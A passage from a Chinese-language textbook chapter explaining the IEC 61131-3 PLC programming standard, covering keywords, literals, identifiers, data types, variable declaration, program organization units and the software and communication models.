61131-3标准明确规定。因此,关键字不能用于用户定义的变量或其他名称。这一点与高级编程语言是一致的。 关键字不区分字母的大、小写。例如,关键字“FOR”和“for”是等价的。为了更好地进行区别,关键字通常以大写字母表示。表4.3所示为关键字及其含义。 关键字主要包括:基本数据类型的名称、标准功能名、标准功能块名、标准功能的输入参数名、标准功能块的输入和输出参数名、图形编程语言中的EN和ENO变量、指令表语言中的运算符、结构化文本语言中的语言元素、顺序功能图语言中的语言元素。 表4.3 关键字及其含义 续表 续表 3.直接量 直接量用来表示常数变量的数值,其格式取决于变量的数据类型。直接量有3种基本类型。 1)数字直接量 数字直接量可以用于定义一个数值,它可以是十进制或其他进制的数。数值文字分为整数和实数。用十进制符号表示的数中,用小数点的是否存在表示它是实数还是整数。通常有二进制数、八进制数、十进制数、十六进制数。为了说明数值的基,可用元素数据类型名称和“#”符号表示,但十进制的基数10#可以省略。 对十进制数值,为了表示数值的正负,可在数值文字前添加前缀分界符。例如-15、-126.83。但对数制的基(即2、8、10和16)不能添加类型前缀的分界符。因此,-8#456是错误的数据外部表示,应表示为8#-456。 布尔数据用整数0和1表示,也可用FALSE和TRUE的关键字表示。 2)字符串直接量 字符串是直接量在单引号之间的表示形式,由单字节字符串或双字节字符串组成。 单字节字符串文字由一系列通用的字节表示或$'、英文双引号"、$与十六进制数组成。例如,‘ABC’,‘ " ’,‘$D7’ 等。当美元符号$用作缀,使特殊字符能包含在一个字符串内。非印刷体的特殊字符用于显示或打印输出的格式化文本。因此,美元符号和引号本身必须用附加的前缀“$”标识。 双字节字符串文字由一系列通用的字节表示或由$"、英文单引号'、$与十六进制数组成。它们用双引号在其前后标识。例如,“A”,“'”,“$"”,“$UI8T”等。 需要注意的是单字节字符串不能用单引号开始,双字节字符串不能用双引号开始。字符串可以是空串,例如,“ ”和‘’。 表4.4所示为在字符串中使用“$”符号对应的含义。 表4.4 在字符串中使用“$”符号及其含义 3)时间直接量 时间直接量用于时间、持续时间和日期的数值。 时间直接量分为两种类型:持续时间直接量和日时直接量。持续时间直接量由关键字T#或TIME#在左边界定,支持按天、小时、秒和毫秒或其他任意组合表示的持续时间数据。持续时间直接量的单位由下画线字符分隔。允许持续时间直接量最高有效位“溢出”(overflow)。例如,持续时间值t#135m_12s是有效的,编程系统会将该时间转换成“正确”的表达,即t#2h_15m_12s。时间单位可用大写或小写字母表示。持续时间的正值和负值是允许的。 时间和日期的前缀关键字如表4.5所示,它分为长前缀和短前缀格式。不论采用长前缀格式还是短前缀格式,表示的时间和日期都是有效的。 表4.5 时间和日期直接量的长前缀和短前缀 4.标识符 标识符(identifier)是字母、数字和下画线字符的组合。其开始必须是字母或下画线字符,并被命名为语言元素(Language Element)。标识符对字母的大、小写不敏感,所以标识符ABCD和abcD具有相同的意义。 标识符用于表示变量、标号,以及功能、功能块、程序组织单元等名称。在IEC 61131-3标准中,可以指定名称的语言元素包括以下内容: · 跳转和网络标号。 · 枚举常数。 · 配置、资源、任务/运行期程序。 · 程序、功能、功能块。 · 存取路径。 · 变量(通用,符号和直接表达的变量)。 · 导出的数据类型、结构化数据。 · 转换、步、动作块。 在标识符中下画线是有意义的,例如,EF_34和E_F34是两个不同的标识符。应注意下画线在标识符中的使用,标识符不允许以多个下画线开头或多个连续内嵌的下画线。标识符也不允许以下画线结尾。 在支持使用标识符的所有系统中,为便于识别,至少应支持6个标识符,即如果一个编程系统允许每个标识符有16个字符时,程序员应确保所编写标识符的前6个字符是唯一的。因此,在只具有6个有效位的编程系统中,wzy_123与wzy_1234被系统认为是相同的标识符。一个标识符中允许的最多字符数是与执行过程有关的参数。表4.6所示为标识符的特性和示例。 需要注意的是,字母、数字和下画线以外的字符不允许作为标识符的字符,如空格、钱币符号、小数点和各种括号等。因此,VALVE.1和SUM$50(2)是无效标识符。 表4.6 标识符的特性和示例 4.2.2 数据类型 IEC 61131-3对数据类型进行了定义,从而防止对数据类型的不同设置而发生出错。数据类型的标准化是编程语言开放性的重要标准。 在IEC 61131-3中定义一般数据类型和非一般数据类型两类。非一般数据类型又可分为基本数据类型和衍生数据类型。数据类型与它在数据存储器中所占用的数据宽度有关。 IEC 61131-3标准定义了编程最常用的数据类型,因而在PLC领域内,这些数据类型的含义和使用是统一的。这对于机器和设备制造商,以及使用来自不同制造商的多台PLC和编程系统的技术人员,会带来明显的益处:统一的数据类型能增加PLC程序的可移植性。 1. 基本数据类型 基本数据类型(Elementary Data Type,EDT)是在标准中预先定义的标准化数据类型,它有约定的数据允许范围和初始值,如表4.7所示。约定初始值是在对该类数据进行声明时,如果没有赋初始取值时就用系统提供的约定初始值。 表4.7 IEC 61131-3标准的基本数据类型 在这个标准中,对BCD数据类型和计数器数据类型都没有进行定义。现在BCD码已不如过去那么重要,所以在PLC系统内必须根据特殊目的单独的定义。计数器值由通常的整数实现,不需要特殊的格式,至少对于IEC 61131-3的标准计数器功能块是这样的。 2.一般数据类型 一般数据类型(Generic Data Type,GDT)用前缀“ANY”标识。它采用分级结构,如表4.8所示。一般数据类型使用时应该遵循以下原则: (1)一般数据类型不能用于由用户说明的程序组织单元。 (2)子范围衍生类型的一般数据类型应为“ANY_INT”。 (3)直接衍生数据类型的一般数据类型与由此基本元素衍生的一般数据类型相同。 (4)所有其他衍生类型的一般数据类型定义为“ANY_DERIVED”。 3.衍生数据类型 衍生数据类型(Derived Data Type,DDT)是用户在基本数据类型的基础上,建立的由用户定义的数据类型,因此,也称为导出数据类型。这种类型定义的变量是全局变量,可使用与基本数据类型相同的方法来进行变量的声明。 对衍生数据类型的定义必须采用文本表达方式,IEC 61131-3标准并没有提及图形表达方式。类型定义由关键字TYPE和END_TYPE构成。 衍生数据类型有五种,分别是从基本数据类型直接衍生的数据类型、枚举数据类型、子范围数据类型、数组数据类型和结构化数据类型,如表4.8所示。 表4.8 一般数据类型的分级 (1)直接衍生数据类型。如用户用缩写的LRL来表示数据类型LREAL。因此,采用这种方式的数据类型衍生,在以后的应用中就可以直接用LRL表示长实数数据类型。 (2)枚举数据类型。实际上一个枚举数据类型不是一个导出数据类型,因为它不是从任何基本数据类型中导出得到的。如表4.9所示序号2中衍生数据类型Medal_Type由3种奖牌组成,它们是Gold,Silver和Bronze。因此,变量可以用枚举中的一个名称作为其值。 (3)子范围数据类型。当数据的范围在该数据类型允许的范围内部时,需要定义子范围数据类型。例如,基本数据类型INT的允许取值范围是-32768~32767,如果某类数据只允许取值为-4096~4095,则需要定义子范围数据类型。 (4)数组数据类型。一个数组由多个相同数据类型的数据元素组成。因此,数组定义为衍生数据类型。在规定的数组界限内,借助于数组注脚(索引)可存取数组元素,注脚的值指示要寻址哪个数组元素。数组数据类型用ARRAY表示,用方括号内的数据定义其范围。当维数大于一维时,用逗号分割。 (5)结构化数据类型。采用关键字STRUCT和END_STRUCT可以分层建立数据结构,这如同高级编程语言中的数据结构。这些数据结构包括任何基本的或导出的数据类型作为子元素。在数据结构中,同样不允许使用FB实例名。 除了上述5种衍生数据类型,还可以定义混合数据类型。混合数据类型包括(多个)导出的或基本的数据类型。通过这种方法,PLC程序员可优化地适配其数据结构,以满足应用要求。 表4.9 衍生数据类型示例 4.2.3 变量 与数据的外部表示相反,变量提供能够改变其内容的数据对象的识别方法。例如,可改变与PLC输入、输出或存储器有关的数据。变量可以被声明为基本数据类型、一般数据类型和衍生数据类型。 1. 变量的表示 在IEC 61131-3标准中,变量分为单元素变量和多元素变量。 1)单元素变量 单元素变量(single-element variable)用于表示基本数据类型的单一数据元素、衍生的枚举数据类型或子范围数据类型的数据元素,或上述数据类型的衍生数据元素。单元素变量可以是直接变量或符号变量。 (1)直接变量(direct variable) 以百分号“%”开始,随后是位置前缀符号和大小写前缀符号。如果有分级,则用整数表示分级,并用小数点“.”分隔表示直接变量。表4.10是直接表示变量中前缀符号的定义。表4.11是直接表示变量的示例。 表4.10 直接表示变量中前缀符号的定义 直接变量可用于程序、功能块、配置和资源的声明中。一个可编程控制器系统的程序存取另一个可编程控制器中的数据时,采用分级寻址的方式,这应被认为是一种语言的扩展。 直接变量类似于传统可编程控制器中的操作数,它对应于一个可寻址的存储器单元。需要注意的是,在早期可编程控制器的产品中并没有对操作数进行明确定义,所以一些产品用编号表示操作数。在IEC 61131-3标准中,将存储器的地址分为输入单元、输出单元和存储器单元,并且用直接表示变量的方法来表示变量。直接表示变量的值可根据变量的地址直接存取。例如,VAR_INPUT AT %IX2.3:BOOL;END_VAR表示一个变量直接从%IX2.3地址读取布尔数据类型的数据。 (2)符号变量(symbolic variable) 符号变量是用符号表示的变量。其地址对不同的可编程控制器可以不同,从而为程序的移植创造条件。例如,在VAR_INPUT SW_1 AT %IX2.3:BOOL;END_VAR中,用符号变量SW_1表示从%IX2.3地址读取布尔量。当实际地址改变时,在程序的其他部分仍使用该符号变量,因此,只需要对该地址进行修改,对程序的其他部分可以不做修改,就可以完成整个程序的移植。 表4.11 直接表示变量示例 直接表示变量和符号表示变量借助分级地址指令表语言中的应用,给一个标志或I/O地址指定一个数据类型,这样能使编程系统检查是否正在正确地存取该变量。例如,一个被说明为“AT %QD5:DINT”的变量不会因疏忽而以UINT或REAL类型存取。用直接表示变量代替至今还在程序中经常使用的直接PLC地址,在这种情况下,地址的作用与变量名(如%IW4)一样。 符号变量的声明及其使用与正常变量的声明和使用一样,只不过其存取位置不能由编程系统自由地指定,而限于由用户以“AT”指定的地址。这些变量对应于预先由分配表或符号表指定的地址。 在程序、资源和配置中,直接表示变量和符号变量可以用于变量类型VAR,VAR_GLOBAL,VAR_EXTERRNAL和VAR_ACCESS的声明。在功能块中,它们只能用VAR_EXTERNAL输入。 2)多元素变量 多元素变量(multi-element variable)包括衍生数据类型中数组类型的变量和结构化数据类型的变量。 数组数据类型变量也称为数组变量,它用符号变量名和随后的下标表示。下标包含在一对括号内,用逗号分隔。例如,数组变量AI:ARRAY[1..3,1..8] OF REAL表示数组变量AI,它是由3×8个实数数据类型的变量组成的,各组成变量是:AI[1,1],AI[1,2],…,AI[1,8],AI[2,1],AI[2,2],…,AI[2,8],AI[3,1],AI[3,2],…,AI[3,8]。 结构数据类型变量也称为结构变量,它用结构变量名表示。 访问数组中的元素,可以通过选择方括号内整数的数组注脚(索引)的方法。对结构元素寻址,可以采用“结构的变量名.结构部件名”的形式。 2. 变量的类型 IEC 61131-3标准定义了9种不同的变量类型,表4.12所示为变量的类型关键字和它们的用法。 表4.12 变量的类型与用法 续表 3. 变量的附加属性 IEC 61131-3标准在定义变量的同时,也定义了变量的附加属性(或限定符),并通过它们将附加的特性赋给变量。变量的附加属性如表4.13所示。 表4.13 变量的附加属性 在IEC 61131-3标准中,并非所有变量类型都具有附加属性。应用附加属性要遵循下列准则: (1)在VAR,VAR_INPUT,VAR_OUTPUT,VAR_GLOBAL段内声明的变量允许使用附加属性RETAIN和NON_RETAIN。 (2)当功能块或程序实例中使用附加属性RETAIN和NON_RETAIN时,所有实例的成员都被处理为具有RETAIN和NON_RETAIN属性。除非成员本身是功能块,或者在功能块或程序类型的声明中明确被作为RETAIN和NON_RETAIN使用。 (3)在VAR_CONFIG实例中允许使用附加属性RETAIN和NON_RETAIN。这时,所有该结构变量的成员,包括嵌套结构的成员都具有相应的附加属性。 (4)当没有说明附加属性的变量初始化时,应根据热启动特性确定其初始值。 (5)附加属性CONSTANT说明该变量是不允许改变其值的特殊变量。因此,同时对某个变量附加CONSTANT和RETAIN属性是没有必要的。这时,只需用CONSTANT的附加属性。在掉电后的热启动时,该变量仍可保持该常数值。 (6)对VAR和VAR_GLOBAL变量,可以附加CONSTANT属性。 (7)上升沿和下降沿的边沿检测属性只对输入变量有效,读/写和只读属性只对存取变量有效。 (8)一般附加属性的关键字是紧跟在变量关键字后的。例如,VAR CONTANT:VAR_OUTPUT RETAIN等。但上升沿、下降沿的边沿检测属性及读/写、只读属性的关键字是在变量数据类型后的。例如,VAR RI:REAL_EDGE;VAR RW:READ_WRITE。 属性READ_ONLY和READ-WRITE是专为变量类型VAR_ACCESS保留的。在配置层,不允许对VAR_ACCESS使用其他限定符。 4. 变量的初始化 变量在资源或配置启动时进行初始化,给变量赋初始值。初始化后变量的值根据下列准则确定: (1)当系统停止初始化时,变量具有的被保持的值,如再启动时为掉电前的保持值; (2)用户规定的初始值; (3)根据变量的有关数据类型提供的约定初始值。 电源掉电后的再启动,称为系统的热启动(warm restart)。这时,变量的值应该根据是否有附加属性RETAIN来确定。如果具有该属性,则变量恢复到掉电前的值;如果没有该属性,则称为系统的冷启动(cold restart)。这时,变量初始值由用户规定的初始值或该变量对应的数据类型的默认初始值(当没有用户规定初始值时)确定。这表明,变量初始值取值有优先级,RETAIN提供最高优先级,系统默认初始值提供最低优先级。 需要注意的是,有外部输入的变量不能由用户规定其初始值。例如,VAR_INPUT、VAR_EXTERNAL段声明的变量不能赋予初始值。表4.14所示为变量的初始化特性与示例。 表4.14 变量的初始化特性与示例 续表 5. 变量声明 在IEC 61131-3标准中,变量用于初始化、处理和储存用户数据。变量声明用于建立变量与它的数据类型之间的关系,在变量声明中可以对一些变量设置用户的初始值,变量声明和初始化在变量声明段同时完成。 变量的声明以表4.12的变量类型关键字开始,它表示该变量段内说明的变量类型,中间是变量声明段本体,变量声明段以END_VAR结束。具有相同数据类型的变量可以集中声明。 在每一个程序组织单元(POU)的开始部分,必须对变量予以声明,这就包括对变量数据类型、变量属性(如电池后备、初始值或物理地址赋值等)的定义。 对不同的变量类型,POU变量的声明分为不同的段/声明块,每个段/声明块对应于一种变量类型,并可以包括一个或多个变量,且相同变量类型的块的次序和数量可以自由决定。 (1)局部布尔变量 VAR VarLocalB1,VarLocalB2 : BOOL;END_VAR(*局部布尔变量*) (2)调用接口(输入参数) VAR_INPUT Varln1,Varln2 : REAL;  END_VAR (*输入变量*) VAR_IN_OUT VarInOut1,VarInOut2 : UNIT; END_VAR (*输入/输出变量*) (3)返回值(输出参数) VAR_OUTPUT VarFunOut : TNT; END_VAR (*输出变量*) (4)全局接口(全局/外部变量和存取路径) VAR_EXTERNAL VarExt1 : WORD;END_VAR (*外部,来自其他POU*) VAR_GLOBAL VarGlob1 : WORD;END_VAR (*全局,用于其他POU*) VAR_ACCESS VarAccess1 : WORD;END_VAR (*到配置的存取路径*) 除了文本形式定义变量以外,对于POU接口的简单变量的声明,IEC 61131-3标准提供了图形表达的定义方式。但必须说明的是,对于数组数据类型,对变量或初始值的声明,必须使用文本化的表达方式。 4.3 程序组织单元 4.3.1 程序组织单元及其组成 1. 程序组织单元概述 IEC 61131-3标准很重要的一个目的就是限制块的多样性,并同时隐含块类型的含义,统一并简化块的用法。IEC 61131-3引入构成程序和项目的块,即程序组织单元(Program Organization Unit,POU)。程序组织单元由程序组织单元的说明部分和程序组织单元的本体两部分组成,它对应于传统PLC编程领域的程序块、组织块、顺序块和功能块。程序组织单元彼此之间能够带有或不带有参数地相互调用,程序组织单元是用户程序中最小的、独立的软件单元。程序组织单元的标准部分,如标准功能、标准功能块等由PLC制造商提供。用户可以根据程序组织单元的定义设计用户的程序组织单元,并对其进行调用和执行。 IEC 61131-3将PLC制造商的块类型的种类减少为3种统一的基本类型,它们分别是Function(FUN功能)、Function Block(FB功能块)和Program(PROG程序),如图4.2所示,它们的含义见表4.15。根据IEC 61131-3标准,程序、功能和功能块都被称为程序组织单元POU。 图4.2 程序组织单元 表4.15 IEC 61131-3标准的3中POU及其含义 在IEC61131-3中,不允许其他高级语言中应用的局部子程序。这样在对一个POU编程后,其名称及其调用接口将为此项目中所有的其他POU所认知,也就是说,程序组织单元名称总是全局的。程序组织单元的独立性有利于自动化任务的模块化扩展,以及已实现和已测试的软件单元的重复使用。 2. 程序组织单元的组成 程序组织单元由3部分组成,即程序组织单元类型和名称、带有变量声明的声明部分、带有程序组织单元指令的主体,其元素构成如图4.3所示。 图4.3 POU元素构成 1)声明部分 定义程序组织单元内所使用的变量,应注意区别程序组织单元接口变量和程序组织单元局部变量。在程序组织单元的代码部分,使用编程语言对逻辑电路或算法进行编程。在IEC 61131-3中,变量用于初始化、处理和存储用户数据。在每个程序组织单元的开始部分必须声明变量,变量赋予的数据类型必须是已知的。对不同的数据类型,程序组织单元变量的声明部分分为不同的段,每个声明部分对应于一种变量类型,并可以包括一种或多种变量。 2)接口部分 程序组织单元接口以及在程序组织单元中使用的局部数据区是借助在声明块中将程序组织单元变量赋予变量类型进行定义的。程序组织单元接口分为以下几个部分。 调用接口:形式参数(输入和输入/输出参数) 返回值:输出参数或功能返回值 全局接口:带有全局/外部变量和存取路径 调用接口的变量也称为形式参数。调用一个程序组织单元时,形式参数为实际参数代替,形式参数被赋予实际值或常数。 3)代码部分 程序组织单元的指令或代码部分紧接声明部分,它包含PLC执行的指令。可以利用IEC 61131-3提供的5种编程语言来编写代码,根据程序要完成的不同的功能要求和任务特点,合理利用这些编程语言来编写代码,从而完成适合于不同的控制任务和应用领域的程序编写。 3. 几种程序组织单元类型的相互调用 根据IEC 61131-3标准,3种类型的程序组织单元可以相互调用,如图4.4所示。但在调用时要注意以下几点: (1)程序可调用功能块和功能,但功能和功能块不能调用程序。 (2)功能块和功能块可以互相调用。 (3)功能块可调用功能,但功能不能调用功能块。 (4)3种类型的程序组织单元不能直接或间接地调用它自身的一个实例。 图4.4 POU类型的相互调用 4.3.2 功能 功能是一种可以赋予参数,但没有静态变量的程序组织单元。有些书籍或文献也称功能为函数。当用相同的输入参数调用某一功能时,该功能总能够生成相同的结果作为其功能值。功能有多个输入变量,没有输出变量,但有一个功能值作为该功能的返回值。功能由功能名和一个表达式组成。 功能分为标准功能和用户定义功能(衍生功能)。 1. 标准功能 IEC 61131-3标准定义了8类标准功能,包括: (1)类型转换功能—用于数据类型的转换。例如,整数数据类型转换为实数的功能INT_TO_REAL。在进行数据类型转换时,可能引起误差。 (2)数值类功能—数值类功能用于对数值变量进行数学运算。该功能的图形表示是将数值功能的名称填写在功能图形符号内,并连接有关的输入和输出变量。 (3)算术类功能—算术类功能用于计算多个输入变量的算术功能,包括ADD(加)、SUB(减)、MUL(乘)、DIV(除)、MOD(模除)、SQRT(平方根)、SIN(正弦)、COS(余弦)、MIN(最小)、MAX(最大)等。 (4)位串类功能—位串功能包括串移位运算和位串的按位布尔功能。 (5)选择和比较类功能—选择类功能用于根据条件来选择输入信号作为输出返回值。选择的条件包括单路选择,或输入信号本身的最大、最小、限值和多路选择等。 (6)字符串类功能—字符串功能用于对输入的字符串进行处理,例如,确定字符串的长度、对输入的字符串进行截取、处理后的新字符串作为该功能的返回值。 (7)时间数据类功能—时间数据类功能是当数据类型是时间数据类型时,上述有关功能的扩展。例如,时间数据类型的转换、时间数据的算术运算等。 (8)枚举数据类型的功能—在选择和比较类型功能中,可以看到,SEL和MUX的输入变量是ANY类型,因此,它适用于衍生数据类型。当用于枚举数据时,输入和输出的枚举数据个数应相同。枚举数据类型也适用于比较类功能的EQ和NE功能。 2. 用户定义功能 用户定义功能是用户自行定义的功能,一旦做了定义,则该功能就可反复使用。 下面举一个用户定义功能的例子,定义一个功能(A*B/C)2,功能名是SIMPLE_FUN,功能主体用ST语言写。 4.3.3 功能块 功能块是在执行时能够产生一个或多个值的程序组织单元。 变量的实例化是编程人员在变量说明部分用指定变量名和相应数据类型来建立变量的过程。同样,功能块实例化是编程人员在功能块说明部分用指定功能块名和相应的功能块类型来建立功能块的过程。每个功能块实例有它的功能块名、内部变量、输出变量及可能的输入变量数据结构。该数据结构的输出变量和必要的内部变量的值能够从这次执行保护到下一次执行。功能块实例的外部只有输入和输出变量是可存取的。功能块内部变量对用户来说是隐藏的。功能块的图形表示如图4.5所示。 图4.5 功能块的图形表示 功能块包括标准功能块、衍生功能块和用户定义功能块。衍生功能块是利用标准功能块创造的新功能块。IEC 61131-3允许用户利用已有的功能块和功能生成新的功能块。任意功能块均可采用便于管理且功能更简单的功能和/或功能块进行编程。 功能块有两个主要特征: · 定义一组输入/输出参数,用来与其他功能块或内部变量交换数据。 · 每一个功能块均有其特定的算法,通过对输入参数值和内部变量值的处理,生成相应的输出。这就是说,功能块具有完善定义的输入和输出界面以及隐含的内部结构。软件设计人员可以定义、修改功能块,而软件维护人员只能使用功能块。 功能块一旦被定义,就可反复使用。功能块可以用任意一种IEC 61131-3的编程语言来编写,但在大多数情况下是用结构化文本语言编写。 功能和功能块的主要区别在于,相同输入参数调用时,功能总是产生相同的结果(功能值),功能没有“记忆”特性。程序代表PLC用户的最高层,能存取PLC的I/O口,并能使它们能为其他程序组织单元所存取。IEC 61131-3标准使用变量以存储信息。但是,它们的存储位置不再需要由用户自行定义,而是由编程系统自行进行管理,每个变量具有固定的数据类型。IEC 61131-3规定若干数据类型,这些数据类型在位数量和符号的使用方面有所不同。 功能块段的文字形式可以表示为: IEC 61131-3中定义了5种标准功能块: (1)双稳元素功能块—双稳元素(Bitstable Element)功能块有两个稳态,根据两个输入变量都为1时,输出稳态值的不同,可分为置位优先(SR)和复位优先(RS)两类。 (2)边缘检测功能块—边缘检测(Edge Detection)功能块用于对输入信号的上升沿和下降沿进行检测。因此,分为上升沿检测(R_TRIG)功能块和下降沿(F_TRIG)检测功能块两类。 (3)计数器功能块—计数器(Counter)功能块有3种基本类型。它们是加计数器、减计数器和加减计数器,用于计数器的变量是整数类型。 (4)定时器功能块—定时器(Timer)功能块是用定时器实现接通延时、断开延时和定时脉冲。 (5)通信功能块—通信功能块详见IEC 61131-5的定义。它为可编程控制器提供远程寻址、设备检测、轮询数据的采集、编程数据采集、参数控制、互锁控制、编程报警报告及连接管理和保护。除了远程寻址是功能,其他都是功能块。 4.3.4 程序 程序是程序组织单元之一,它由功能和功能块组成。PROGRAM类型的程序组织单元称为主程序。在一个多CPU的PLC控制系统中,能同时执行多个主程序,这一点体现了程序与功能块的不同。 程序以PROGRAM关键字开始,随后是程序名、程序声明和程序体,最后以END_PROGRAM关键字结束。与功能或功能块的声明类似,程序声明包括在整个程序声明中所使用变量的声明。 除了具有功能块的性能外,程序还具有以下性能: (1)可对VAR_ACCESS 和VAR_GLOBAL变量进行说明和存取。 (2)可对VAR_GLOBAL和VAR_EXTERNAL变量添加CONSTANT属性,对这些变量进行限定。 (3)可对VAR_TEMP变量进行说明和存取。 (4)允许说明存取PLC物理地址的直接表示变量。 (5)程序不能由其他程序组织单元显式调用。但程序与配置中的一个任务结合,使程序实例化,形成运行期程序,便可由资源调用。 (6)程序仅能在资源中实例化。而功能块仅能在程序或其他功能块中实例化。 在一般计算机编程语言中,是允许递归调用的,但IEC 61131-3标准规定程序组织单元不能直接或间接调用其自身,以保护程序,防止程序出错。 4.4 软件、通信和功能模型 4.4.1 软件模型 IEC 61131-3的软件模型用分层结构表示。每一层隐含其下层的许多特性,从而构成优于传统可编程控制器软件的理论基础。图4.6是IEC 61131-3的软件模型,该模型描述了基本的高级软件元素及其相互关系,它由标准定义的编程语言可以编程的软件元素构成。它们包括:程序和功能块;组态元素,即配置、资源和任务;全局变量;存取路径和实例特定的初始化。 图4.6 IEC 61131-3标准的软件模型 IEC 61131-3的软件模型从理论上描述了将一个复杂程序如何分解为若干小的不同的可管理部分,规定了每个部分的规范及它们进行接口的方法。软件模型描述一台可编程控制器如何实现多个独立程序的同时装载和运行,如何实现对程序执行的完全控制等,如何实现对资源的共享,如何实现信息的通信。该模型也体现了任务分解的思想和软件工程中面向对象特性带来的许多优点,使得处理复杂的控制任务变得更加容易,程序的开发、调试、维护、移植与重用等也具有了许多高级语言所具有的特性,更方便了具有高级语言编程经验的人员开发控制程序。 1. 配置 配置(Configuration)是语言元素,或结构元素,它相当于IEC 61131-3所定义的可编程控制系统。 配置位于软件模型的最上层,它等同于一个PLC软件。在一个复杂的由多台PLC组成的自动化系统中,每台PLC中的软件是一个独立的配置。一个配置可以与其他IEC配置通过通信接口进行通信。因此,可以将配置认为是一个特定类型的控制系统,它包括硬件装置、处理资源、I/O通道的存储地址和系统能力,即等同于一个PLC的应用程序。在一个由多台PLC构成的控制系统中,每一台PLC的应用程序就是一个独立的配置。 在PLC系统中,配置将系统内所有资源结合成组,它为资源提供数据交换的手段。在一个配置中,可定义在该PLC项目中全局有效使用的全局变量。在配置中可以设置配置之间的存取路径,并说明直接表示变量。 配置用关键字CONFIGURATION开始,随后是配置名称,以及配置的声明,最后用END_CONFIGURATION结束。配置声明包括定义该配置的有关类型和全局变量的声明,在配置内资源的声明和存取路径的声明等。 2. 资源 资源(Resource)位于软件模型的第二层。资源为运行的程序提供支持系统,它反映可编程控制器的物理结构,资源为程序和PLC的物理输入/输出通道之间提供一个接口。因此,资源具有IEC 61131-3定义的“信号处理功能”及“人机接口”和“传感器和执行器接口”功能。一个IEC程序只有装入资源后才能执行。一般而言,资源放在PLC内,当然它也可以放在其他系统内(只要该系统支持IEC程序的执行)。资源有一个资源名称,它通常被赋予一个PLC中的CPU。因此,可将资源理解为一个PLC中的微处理器单元。若一个PLC应用系统配置有多个CPU,则该配置下有多个资源。 在资源内定义的全局变量在该资源内部是有效的。资源可调用具有输入/输出参数的运行期(Run-Time)程序、给一个资源分配任务和程序,并声明直接表示变量。 资源用关键词RESOURCE开始,随后是资源名称和ON关键字、资源声明,最后用END_RESOURCE关键字结束。在资源声明段中,ON关键字用于限定“处理功能”类型、“人机接口”类型和“传感器和执行器接口”功能。 3. 任务 任务(Task)位于软件模型分层结构的第三层,用于规定程序组织单元在运行期的特性。任务是一个执行控制元素,它具有调用能力。 一个资源内可以定义一个或多个任务。任务被配置以后可以控制一组程序或功能块。它们可以是周期地执行,也可以由一个事件驱动而予以执行。 任务有任务名称,并有3个输入参数,即SIGNAL、INTERVAL和 PRIORITY: (1)SIGNAL—单任务输入端,在该事件触发信号的上生沿,触发与任务相关联的程序组织单元执行一次。 (2)INTERVAL—周期执行时的时间间隔。当其值不为零时,并且SIGNAL信号保持为零时,则表示该任务的有关程序组织单元被周期执行,周期执行的时间间隔由该端输入的数据确定。 (3)PRIORITY—当多个任务同时运行时,对任务设置的优先级。0级表示最高优先级,优先级越低,数值越高。当同时存在有优先级和无优先级的任务执行时,先执行优先级高的任务。 4. 存取路径 存取路径用于将全局变量、直接表示变量与功能块的输入、输出和内部变量联系起来,实现信息的存取。它提供了不同配置直接交换数据和信息的方法。每一个配置内的变量可被其他远程配置存取。存取方法有两种:读/写(READ_WRITE)方式和只读(READ)方式。读/写方式表示通信服务能够改变变量的值,只读方式表示能够读取变量的值但不能改变该变量的值。当不规定存取路径方式时,约定的存取方式是只读方式。 存取路径用VAR_ACCESS开始,用END_VAR结束,中间是存取路径的声明段。存取路径的声明段由存取路径名、外部存取的变量、存取路径的数据类型和存取方式等组成。存取路径名与变量、数据类型间用冒号分隔。 5. IEC 61131-3软件模型与传统PLC软件模型的比较 将IEC 61131-3给出的软件模型与传统运行于一个封闭系统中的PLC(其中包括一个资源、运行一个任务、控制一个程序)进行比较,可以发现IEC软件模型在传统PLC的软件模型的基础上增加了许多内容,如以下部分: (1)IEC 61131-3的软件模型适用范围广,它不是针对一个具体的PLC系统,因此,具有很强的适用性,能够应用于不同制造商的PLC产品。 (2)IEC软件模型是一种面向未来的开放系统。它不但可以满足由多个处理器构成的PLC系统的软件设计,也可以方便地处理由事件驱动的程序执行(传统PLC的软件模型仅仅是按时间周期执行的程序结构)。对于以工业通信网络为基础的集散控制系统,尤其基于PC的控制等控制技术,该软件模型均可覆盖和适用。对于现有的各类控制系统,可以利用IEC 61131-3的模型来理解: · 对于只有一个处理器的小型系统,其模型只有一个配置、一个资源和一个程序,与现在大多数PLC的情况完全相符。 · 对于有多个处理器的中、大型系统,整个PLC被视作一个配置,每个处理器都只用一个资源来描述,而一个资源则包括一个或多个程序。 · 对于分散控制系统,将包含多个配置,而一个配置又包含多个处理器,每个处理器用一个资源描述,每个资源包括一个或多个程序。 (3)IEC 61131-3软件模型支持程序组织单元的可重复使用性,而传统的PLC程序很难做到这一点。 (4)对程序的完全控制能力。IEC 61131-3标准的“任务”机制保证了PLC系统对程序执行的完全控制能力。传统的PLC程序采取顺序扫描执行程序,对某一段程序不能按照用户的实际要求来定时执行,且只能运行一个任务;而IEC 61131-3程序允许程序的不同部分在不同的时间、以不同的比率并行执行,扩大了PLC的应用范围。 4.4.2 通信模型 可编程控制器的通信方式有以下3种: (1)同一程序内变量的通信。程序之间直接用一个程序元素的输出连接到另一个程序元素输入的通信。这种通信可以在程序、功能块、功能等组织单元之间进行,如图4.7所示。 图4.7 程序内部的数据通信 (2)同一配置下变量之间的通信。变量只在同一配置下不同程序之间的通信可以通过该配置下的全局变量实现。如图4.8所示。变量a经过配置中的全局变量x,将变量的值传送到另一程序的变量b中。 (3)不同配置下的变量通信。为了实现不同配置下变量的通信,可采取两种方法,即图4.9所示的通过通信功能块的方法和图4.10所示的通过存取路径的方法。 IEC 61131-3标准规定的通信模型,不仅在IEC编程系统内部提供了灵活、便捷的通信手段,而且还有效地支持了IEC编程系统的功能扩展对通信提出的要求,更好适应未来控制系统对编程系统的要求。 图4.8 同一配置下的数据通信 图4.9 不同配置下通过通信功能块实现通信 图4.10 不同配置下通过存取路径实现通信 4.5 IEC 61131-3标准的5种编程语言 IEC 61131-3的编程语言是IEC工作组对世界范围的PLC厂商的编程语言进行了分析借鉴和吸收,吸收了C语言、PASCAL等高级编程语言在数据结构、程序结构、指令等方面的表示方式(主要指的是ST语言),进而形成的一套针对工业控制系统的编程语言国际标准。它既适用于PLC,也适用于更广泛的工业控制领域。选择何种语言编程,与程序设计人员的背景、所面对的控制问题、对这个控制问题的描述程度、控制系统的结构,以及与其他人员和部门的接口等有关。 在IEC 